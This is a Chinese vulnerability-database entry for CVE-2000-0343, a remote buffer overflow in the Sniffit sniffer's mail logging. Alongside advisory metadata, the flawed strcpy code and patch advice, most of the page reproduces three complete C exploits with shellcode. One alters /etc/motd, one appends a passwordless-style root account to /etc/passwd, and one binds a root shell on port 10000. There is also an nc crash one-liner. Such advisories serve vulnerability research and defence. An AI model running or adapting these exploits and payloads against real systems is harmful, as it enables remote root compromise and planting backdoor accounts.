CVE-2000-0343
CVSS10.0
发布时间 :2000-05-02 00:00:00
修订时间 :2008-09-10 15:04:11
NMCOES    

[原文]Buffer overflow in Sniffit 0.3.x with the -L logging option enabled allows remote attackers to execute arbitrary commands via a long MAIL FROM mail header.


[CNNVD]Sniffit处理邮件头缓冲区溢出漏洞(CNNVD-200005-011)

        
        Sniffit是一个常用的sniffer工具。可运行在多种Unix/Linux平台上。
        它存在一个缓冲区溢出漏洞,可能导致攻击者远程获取root权限。
        Sniffit在使用"-L mail"参数处理窃听到的邮件头("mail from:"和"rcpto to:")的时候,会将它们拷贝到一个固定大小的buffer中,导致可能发生溢出问题:问题处在下列两个地方:
         if(strstr(workbuf1,"mail from")!=NULL)
         {
         char workbuf2[MTU];
         strcpy(workbuf2, strstr(workbuf1,"mail from"));
        和
         if(strstr(workbuf1,"rcpt to")!=NULL)
         {
         char workbuf2[MTU];
         strcpy(workbuf2, strstr(workbuf1,"rcpt to"));
        ...
        当用户对局域网内任意主机的25端口发送包含超长"mail from:..."或者"rcpt to:..."内容的消息时,将会导致监听主机上的Sniffit发生溢出:
        echo "mail from:`perl -e 'print "A"x300'`"|nc -vv HOSTNAME 25
        在运行Sniffit的机器上用gdb跟踪得到的结果:
        Program received signal SIGSEGV, Segmentation fault.
        0x61616161 in ?? ()
        (gdb) i all
         eax: 0x0 0
         ecx: 0x8057648 134575688
         edx: 0x8057648 134575688
         ebx: 0xbfff5b84 -1073783932
         esp: 0xbfff47a4 -1073789020
         ebp: 0x61616161 1633771873
         esi: 0xbfff6f0c -1073778932
         edi: 0xbfff6f0c -1073778932
         eip: 0x61616161 1633771873
        ...
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:brecht_claerhout:sniffit:0.3.6hip
cpe:/a:brecht_claerhout:sniffit:0.3.7beta

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0343
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0343
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-011
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1158
(VENDOR_ADVISORY)  BID  1158
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200005021736.TAA01991@ALuSSi
(UNKNOWN)  BUGTRAQ  20000502 spj-003-000 - S0ftPj Advisory

- 漏洞信息

Sniffit处理邮件头缓冲区溢出漏洞
危急 边界条件错误
2000-05-02 00:00:00 2005-10-20 00:00:00
远程  
        
        Sniffit是一个常用的sniffer工具。可运行在多种Unix/Linux平台上。
        它存在一个缓冲区溢出漏洞,可能导致攻击者远程获取root权限。
        Sniffit在使用"-L mail"参数处理窃听到的邮件头("mail from:"和"rcpto to:")的时候,会将它们拷贝到一个固定大小的buffer中,导致可能发生溢出问题:问题处在下列两个地方:
         if(strstr(workbuf1,"mail from")!=NULL)
         {
         char workbuf2[MTU];
         strcpy(workbuf2, strstr(workbuf1,"mail from"));
        和
         if(strstr(workbuf1,"rcpt to")!=NULL)
         {
         char workbuf2[MTU];
         strcpy(workbuf2, strstr(workbuf1,"rcpt to"));
        ...
        当用户对局域网内任意主机的25端口发送包含超长"mail from:..."或者"rcpt to:..."内容的消息时,将会导致监听主机上的Sniffit发生溢出:
        echo "mail from:`perl -e 'print "A"x300'`"|nc -vv HOSTNAME 25
        在运行Sniffit的机器上用gdb跟踪得到的结果:
        Program received signal SIGSEGV, Segmentation fault.
        0x61616161 in ?? ()
        (gdb) i all
         eax: 0x0 0
         ecx: 0x8057648 134575688
         edx: 0x8057648 134575688
         ebx: 0xbfff5b84 -1073783932
         esp: 0xbfff47a4 -1073789020
         ebp: 0x61616161 1633771873
         esi: 0xbfff6f0c -1073778932
         edi: 0xbfff6f0c -1073778932
         eip: 0x61616161 1633771873
        ...
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 修改sn_analyse.c,用strncpy代替strcpy,拷贝固定字节的内容到buffer中去。
        厂商补丁:
        Brecht Claerhout
        ----------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

- 漏洞信息 (19886)

Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1) (EDBID:19886)
multiple remote
2000-05-02 Verified
0 FuSyS
N/A [点击下载]
source: http://www.securityfocus.com/bid/1158/info

Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems.

Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniffit is configured to log emails, attackers may be able to exploit a stack overflow in the logging mechanism and execute arbitrary code as root on the underlying host.

There may be other buffer overflow vulnerabilities in sniffit related to the logging mechanism. There are several suspicious instances of sprintf() in the logging functions. Administrators are advised to use more actively supported alternatives such as Snort or dsniff.

/*
 * Sniffit 0.3.7beta Linux/x86 Remote Exploit
 * ShellCode is a modified version of w00w00 write egg, 
 * to pass Sniffit input filter
 *
 * Tested on 	RedHat 5.2, 6.0, 6.2
 * Proof Of Concept Code
 *
 * credits:	|CyraX| for pointing me to the coredump
 *		del0 for hurrying me :)
 *		vecna for offering me drinks ;P
 *		belf for loving and caring his GSM ;P
 * 
 *     			    	     FuSyS [S0ftpj|BFi]
 * 				 http://www.s0ftpj.org/
 */

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<netdb.h>
#include<netinet/in.h>

#define LENGTH		600
#define RET		RH6x
#define RH52		0xbfff5c10
#define RH6x		0xbfff5bb5 	// 0.3.6HIP 0xbfffcc50
#define OFFSET          0
#define ALIGNOP		3		// 3 RH6.0, 4 RH6.2
					// may vary [1-5]


/* Note To Script Kiddies: This ShellCode Simply Changes An
   Existing /etc/motd So Don't Bother DownLoading */

unsigned char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
"\x30\xe4\x88\x63\x09\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4"
"\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x3f\x01\xf9\x31"
"\xd2\xb2\x0e\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
"\x65\x74\x63\x2f\x6d\x6f\x74\x64\x01\x66\x75\x73\x79\x73\x20\x77"
"\x61\x73\x20\x68\x65\x72\x65\x0a";

unsigned long nameResolve(char *hostname)
{
  struct in_addr addr;
  struct hostent *hostEnt;

  if((addr.s_addr=inet_addr(hostname)) == -1) {
    if(!(hostEnt=gethostbyname(hostname))) {
        printf("Name Resolution Error:`%s`\n",hostname);
        exit(0);
    }
    bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
  }
  return addr.s_addr;
}

int main(int argc,char **argv)
{
        char buff[LENGTH+ALIGNOP+1];
	char cmd[610];
        long addr;
        unsigned long sp;
        int offset=OFFSET;
        int i, x;
        int sock;
        struct sockaddr_in sin;

	if(argc<2) {
		fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
		exit(0);
	}

        sp=(unsigned long) RET;
        addr=sp-offset;

	for(i=0;i<120-ALIGNOP;i++)
		buff[i]=0x90;
	for(x=0; x<strlen(shellcode); i++, x++)
		buff[i]=shellcode[x];
	for(i-=1 ; i<LENGTH; i+=4) {
		buff[i  ] =  addr & 0x000000ff;
  		buff[i+1] = (addr & 0x0000ff00) >> 8;
  		buff[i+2] = (addr & 0x00ff0000) >> 16;
  		buff[i+3] = (addr & 0xff000000) >> 24;
 	}

	printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
	printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");

        memset(&sin,0,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(25);
        sin.sin_addr.s_addr=nameResolve(argv[1]);

	printf("Connecting to %s ...\n", argv[1]);

        if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
        {
                printf("Can't create socket\n");
                exit(0);
        }
        if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
        {
                printf("Can't connect to Sniffit Server\n");
                exit(0);
        }

	printf("Injecting ShellCode ...\n");

	strncat(cmd, "mail from:", 10);
	strncat(cmd, buff, strlen(buff));
	write(sock, cmd, strlen(cmd));

	printf("Done!\n\n");

        return(0);
}
		

- 漏洞信息 (19887)

Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2) (EDBID:19887)
multiple remote
2000-05-02 Verified
0 MaXX
N/A [点击下载]
source: http://www.securityfocus.com/bid/1158/info
 
Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems.
 
Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniffit is configured to log emails, attackers may be able to exploit a stack overflow in the logging mechanism and execute arbitrary code as root on the underlying host.
 
There may be other buffer overflow vulnerabilities in sniffit related to the logging mechanism. There are several suspicious instances of sprintf() in the logging functions. Administrators are advised to use more actively supported alternatives such as Snort or dsniff.

/*
 * 5niffi7.c - exploiting sniffit 0.3.7.beta for Debian 2.2
 * Copyright (C) 2000  Michel "MaXX" Kaempf <maxx@via.ecp.fr>
 *
 * When a running sniffit session logs the packet sent by 5niffi7,
 * the following shellcode is executed. This shellcode adds the
 * line "r00t:36msvq8vbkg5k:0:0:r00t:/:/bin/sh" to /etc/passwd.
 * Cracking r00t's password should not be too hard :-)
 *
 * 5niffi7.c is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define FROM "mail from: "
#define RET 0xbfff6b5b

char shellcode[] =
"\xeb\x5b\x90\x90\x90\x90\x90\x90"
"\x90\x90\x5e\x80\x6e\xd9\x1a\x80"
"\x6e\xdd\x1a\x80\x6e\xd7\x1a\x80"
"\x6e\xc4\x1a\x80\x6e\xe4\x1a\x90"
"\x90\x90\x90\x31\xc0\x88\x60\x0b"
"\xb0\x05\x89\xf3\x31\xc9\x66\xb9"
"\x01\x04\x31\xd2\xcd\x80\x89\xc7"
"\xc6\x60\x31\x24\x31\xc0\x88\x60"
"\x32\xb0\x04\x89\xfb\x8d\x68\x0c"
"\x31\xd2\xb2\x26\xcd\x80\x31\xc0"
"\xb0\x06\x89\xfb\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xa8\xff"
"\xff\xff\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x78\x72\x30"
"\x30\x74\x3a\x33\x36\x6d\x73\x76"
"\x71\x38\x76\x62\x6b\x67\x35\x6b"
"\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e"
"\x2f\x73\x68\x78\x78";

int main( int argc, char * argv[] )
{
	int sock_client;
	struct sockaddr_in addr_server, addr_client;
	int i, j;
	char * ip_src, * ip_dst;
	char conn[ 256 ], msg[ 1500 ];

	if ( argc != 2 )
	{
		fprintf( stderr, "Usage: %s IP\n", argv[0] );
		exit( -1 );
	}

	if ( (sock_client = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
	{
		exit( -1 );
	}

	bzero( (void *)&addr_server, sizeof(struct sockaddr_in) );
	addr_server.sin_family = AF_INET;
	addr_server.sin_port = htons( 25 );
	inet_aton( argv[1], &addr_server.sin_addr );

	if ( connect(sock_client, (struct sockaddr *)&addr_server, sizeof(struct sockaddr_in)) < 0 )
	{
		exit( -1 );
	}

	i = sizeof( struct sockaddr );
	getsockname( sock_client, (struct sockaddr *)&addr_client, &i );

	ip_src = strdup( inet_ntoa(addr_client.sin_addr) );
	ip_dst = strdup( inet_ntoa(addr_server.sin_addr) );
	snprintf( conn, sizeof(conn), "%s.%u-%s.%u", ip_src, ntohs(addr_client.sin_port), ip_dst, ntohs(addr_server.sin_port) );
	free( ip_src );
	free( ip_dst );

	bzero( msg, sizeof(msg) );
	i = 0;
	for ( j = 0; j < strlen(FROM); i++, j++ )
	{
		msg[ i ] = FROM[ j ];
	}
	for ( j = 0; j < 256 - strlen(conn) - strlen(": mail [") - strlen(FROM); i++, j++ )
	{
		msg[ i ] = 'A';
	}
	*((unsigned long *)(&(msg[i]))) = RET;
	i += 4;
	for ( j = 0; j < 1024; i++, j++ )
	{
		msg[ i ] = 0x90;
	}
	for ( j = 0; j < strlen(shellcode); i++, j++ )
	{
		msg[ i ] = shellcode[ j ];
	}

	if ( write(sock_client, msg, strlen(msg)) < 0 )
	{
		exit( -1 );
	}

	close( sock_client );

	exit( 0 );
}		

- 漏洞信息 (19888)

Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3) (EDBID:19888)
multiple remote
2002-01-18 Verified
0 g463
N/A [点击下载]
source: http://www.securityfocus.com/bid/1158/info
 
Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems.
 
Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniffit is configured to log emails, attackers may be able to exploit a stack overflow in the logging mechanism and execute arbitrary code as root on the underlying host.
 
There may be other buffer overflow vulnerabilities in sniffit related to the logging mechanism. There are several suspicious instances of sprintf() in the logging functions. Administrators are advised to use more actively supported alternatives such as Snort or dsniff.

/*

   Remote overflow in sniffit.0.3.7.beta
   tested on slackware 7.1
   found/coded by g463
   -18th january 2002-

   The vulnerability is triggered when the option -L is
called from the
   command line with 'normmail'
   ie : ./sniffit -c ./sample_config_file -L normmail
   It calls a piece of code where the buffer is
unchecked

       //From sniffit.0.3.7.beta/sn_logfile.c
       void print_mail (char *conn, char *msg)
       {
       char line[250];
       sprintf(line,"%s: mail [%s]",conn,msg);
       print_logline (line);
       }

       -  In a normal situation, it could be easier to fill line
[250] with our
       shellcode,  but  since  this buffer  gets filter  with
some kind of
       strlower() function  (thus our shellcode/return
adress too), i rely
       on an unfiltered buffer with the same data so we
can point eip back
       at that place with clean, unmodified shellcode :D


All my brothers (alphabetical order) : Erebus, Jinx,
mtadbf, nitr0gen, Slink[e]
+ some others i forget :p

*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <error.h>
#include <string.h>

#define SMTP_PORT 25
#define MAX_LINE 256
#define BUFLEN 252

//define this to your ip
#define MY_IP "192.168.0.1"

//Value for overwriting eip
//should be the adress of the data buffer + some
couple of garbage bytes
#define RETADR 0x08059408

//Port binding shellcode, binds on port 10000
//taken from bighawk@warfare.com
char shellcode[] =
   "\x31\xc0"			// xor     eax,
eax
   "\x31\xdb"			// xor     ebx,
ebx
   "\x89\xe5"			// mov     ebp,
esp
   "\x99"			// cdq
   "\xb0\x66"			// mov     al,
102
   "\x89\x5d\xfc"		// mov     [ebp-4], ebx
   "\x43"			// inc     ebx
   "\x89\x5d\xf8"		// mov     [ebp-8], ebx
   "\x43"			// inc     ebx
   "\x89\x5d\xf4"		// mov     [ebp-12], ebx
   "\x4b"			// dec     ebx
   "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
   "\xcd\x80"			// int     80h
   "\x89\x45\xf4"		// mov     [ebp-12], eax
   "\x43"			// inc     ebx
   "\x66\x89\x5d\xec"		// mov     [ebp-
20], bx
   "\x66\xc7\x45\xee\x27\x10"	// mov     [ebp-18], word
4135
   "\x89\x55\xf0"		// mov     [ebp-16], edx
   "\x8d\x45\xec"		// lea     eax, [ebp-20]
   "\x89\x45\xf8"		// mov     [ebp-8], eax
   "\xc6\x45\xfc\x10"		// mov     [ebp-4], byte
16
   "\xb2\x66"			// mov     dl,
102
   "\x89\xd0"			// mov     eax,
ed
   "\x8d\x4d\xf4"		// lea     ecx, [ebp-12]
   "\xcd\x80"			// int     80h
   "\x89\xd0"			// mov     eax,
edx
   "\xb3\x04"			// mov     bl, 4
   "\xcd\x80"			// int     80h
   "\x43"			// inc     ebx
   "\x89\xd0"			// mov     eax,
edx
   "\x99"			// cdq
   "\x89\x55\xf8"		// mov     [ebp-8], edx
   "\x89\x55\xfc"		// mov     [ebp-4], edx
   "\xcd\x80"			// int     80h
   "\x31\xc9"			// xor     ecx,
ecx
   "\x89\xc3"			// mov     ebx,
eax
   "\xb1\x03"			// mov     cl, 3
   "\xb0\x3f"			// mov     al,
63
   "\x49"			// dec     ecx
   "\xcd\x80"			// int     80h
   "\x41"			// inc     ecx
   "\xe2\xf8"			// loop    -7
   "\x52"			// push    edx
   "\x68\x6e\x2f\x73\x68"	// push    dword
68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push    dword
69622f2fh
   "\x89\xe3"			// mov     ebx,
esp
   "\x52"			// push    edx
   "\x53"			// push    ebx
   "\x89\xe1"			// mov     ecx,
esp
   "\xb0\x0b"			// mov     al,
11
   "\xcd\x80";			// int     80h


int usage (char *);
int calculate_conn_lenght (struct sockaddr_in, struct
sockaddr_in);

int
main (int argc, char *argv[])
{

   struct sockaddr_in stServer, stClient;
   char *ptHost;
   unsigned long int iHost;
   int iSockfd, iLenght, iAlign = 0;
   char sBuffer[MAX_LINE];
   char sString[300];
   int i;

   if (argc != 2) usage (argv[0]);

   ptHost = argv[1];
   if ( (iHost = inet_addr (argv[1])) == INADDR_NONE)
{

      printf ("Invalid host or host is 255.255.255.255\n");
      exit (-1);

   }

   //Fill the server struct
   memset (&stServer, 0, sizeof (struct sockaddr_in));
   stServer.sin_family      = AF_INET;
   stServer.sin_port        = htons (SMTP_PORT);
   stServer.sin_addr.s_addr = iHost;

   if ( (iSockfd = socket (AF_INET, SOCK_STREAM,
0)) == -1) {

      printf ("Error opening socket\n");
      exit (-1);

   }

   // Fill the client struct, mainly used to calculate the
right align for RET addy
   memset (&stClient, 0, sizeof (struct sockaddr_in));
   stClient.sin_family      = AF_INET;
   stClient.sin_port        = htons (0);
   stClient.sin_addr.s_addr = inet_addr (MY_IP);

   if ( (bind (iSockfd, (struct sockaddr *) &stClient,
sizeof (stClient))) == -1 ) {

      perror ("Cant bind socket");
      exit (-1);

   }

   iAlign = calculate_conn_lenght (stClient, stServer);
   i = BUFLEN - iAlign + 4;

   if ( (connect (iSockfd, (struct sockaddr *)
&stServer, sizeof (stServer))) != 0) {

      perror ("Cant connect");
      exit (-1);

   }
   else printf ("Connected to host %s on port %d\n\n",
ptHost, SMTP_PORT);

   // Recevons la banni^�re du serveur smtp
   if ( (iLenght = recv (iSockfd, sBuffer, MAX_LINE, 0))
== -1) {

      perror ("Cant get server banner");
      exit (-1);

   }
   printf ("%s\n", sBuffer);

   printf ("Building evil string... >:)\n");

   memset (sString, 0x90, sizeof (sString));

   memcpy (sString, "mail from:", strlen ("mail from:"));
   memcpy(sString + i - strlen (shellcode), shellcode,
strlen (shellcode));

   sString[i++] = (RETADR & 0x000000ff);
   sString[i++] = (RETADR & 0x0000ff00) >> 8;
   sString[i++] = (RETADR & 0x00ff0000) >> 16;
   sString[i++] = (RETADR & 0xff000000) >> 24;
   sString[i]   = '\0';

   if ( (send (iSockfd, sString, strlen (sString), 0)) == -
1) {

      perror ("cant send message");
      exit (-1);

   }

   printf ("Evil string sent!\n");
   printf ("Try telneting the host on port 10000 for r00t
shell!\n");

   close (iSockfd);

   return (0);

}

int usage (char *progname)
{

   printf ("%s <ip>\n", progname);
   exit (-1);

}

/*
   function to calculate conn entry lenght
   ie : strlen of ("192.168.0.1.1024-192.168.0.69.25");
   (fuckin dirty but heh it works)
*/
int calculate_conn_lenght (struct sockaddr_in me,
struct sockaddr_in him)
{
   int lenght = 0;
   struct in_addr in;

   in.s_addr = me.sin_addr.s_addr;
   lenght += strlen (inet_ntoa (in));     // 192.168.0.1

   lenght++;                              // .

   lenght += 4;                           // 1220

   lenght ++;                             // .

   in.s_addr = him.sin_addr.s_addr;
   lenght += strlen (inet_ntoa (in));     // 192.168.0.69

   lenght++;                              // .

   lenght += 2;                           // 25

   lenght += strlen (": mail [");

   return (lenght);
}		

- 漏洞信息

10649
Sniffit -L Logging Option MAIL FROM Header Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-01-19 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sniffit Mail Logging Buffer Overflow Vulnerability
Boundary Condition Error 1158
Yes No
2000-05-02 12:00:00 2009-07-11 01:56:00
This vulnerability was discovered by FuSyS <fusys@s0ftpj.org> of s0ftpr0ject 2k - Digital security for Y2K (s0ftpj) no-profit security research.

- 受影响的程序版本

Brecht Claerhout Sniffit 0.3.7 beta
- Debian Linux 2.2 pre potato
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0 r5
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- FreeBSD FreeBSD 3.1
- FreeBSD FreeBSD 3.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- RedHat Linux 5.1
- RedHat Linux 5.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- S.u.S.E. Linux 6.2
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- SGI IRIX 6.5.6
- SGI IRIX 6.5.4
- SGI IRIX 6.5.3 m
- SGI IRIX 6.5.3 f
- SGI IRIX 6.5.3
- SGI IRIX 6.5.2 m
- SGI IRIX 6.5.1
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- SGI IRIX 6.1
- SGI IRIX 6.0.1 XFS
- SGI IRIX 6.0.1
- SGI IRIX 6.0
- Sun Solaris 2.5.1 _x86
- Sun Solaris 2.5.1 _ppc
- Sun Solaris 2.5.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86HW5/98
- Sun Solaris 2.6_x86HW3/98
- Sun Solaris 2.6_x86
- Sun Solaris 2.6 HW5/98
- Sun Solaris 2.6 HW3/98
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
- Sun Solaris 2.4_x86
- Sun Solaris 2.4
- Sun SunOS 4.1.4 -JL
- Sun SunOS 4.1.4
Brecht Claerhout Sniffit 0.3.6 HIP
- Debian Linux 2.2 pre potato
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0 r5
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- FreeBSD FreeBSD 3.1
- FreeBSD FreeBSD 3.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- RedHat Linux 5.1
- RedHat Linux 5.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- S.u.S.E. Linux 6.2
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- SGI IRIX 6.5.6
- SGI IRIX 6.5.4
- SGI IRIX 6.5.3 m
- SGI IRIX 6.5.3 f
- SGI IRIX 6.5.3
- SGI IRIX 6.5.2 m
- SGI IRIX 6.5.1
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- SGI IRIX 6.1
- SGI IRIX 6.0.1 XFS
- SGI IRIX 6.0.1
- SGI IRIX 6.0
- Sun Solaris 2.5.1 _x86
- Sun Solaris 2.5.1 _ppc
- Sun Solaris 2.5.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86HW5/98
- Sun Solaris 2.6_x86HW3/98
- Sun Solaris 2.6_x86
- Sun Solaris 2.6 HW5/98
- Sun Solaris 2.6 HW3/98
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
- Sun Solaris 2.4_x86
- Sun Solaris 2.4
- Sun SunOS 4.1.4 -JL
- Sun SunOS 4.1.4

- 漏洞讨论

Sniffit is a freely available, open source network monitoring tool. It is designed for use on the Unix and Linux Operating Systems.

Sniffit contains a remotely exploitable buffer overflow vulnerability. If Sniffit is configured to log emails, attackers may be able to exploit a stack overflow in the logging mechanism and execute arbitrary code as root on the underlying host.

There may be other buffer overflow vulnerabilities in sniffit related to the logging mechanism. There are several suspicious instances of sprintf() in the logging functions. Administrators are advised to use more actively supported alternatives such as Snort or dsniff.

- 漏洞利用

- 解决方案

Sniffit is not actively maintained or supported. Users are advised to use an alternative packet sniffer such as Snort or dsniff.

Some vendor-specific patches have been created:


Brecht Claerhout Sniffit 0.3.6 HIP

Brecht Claerhout Sniffit 0.3.7 beta

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站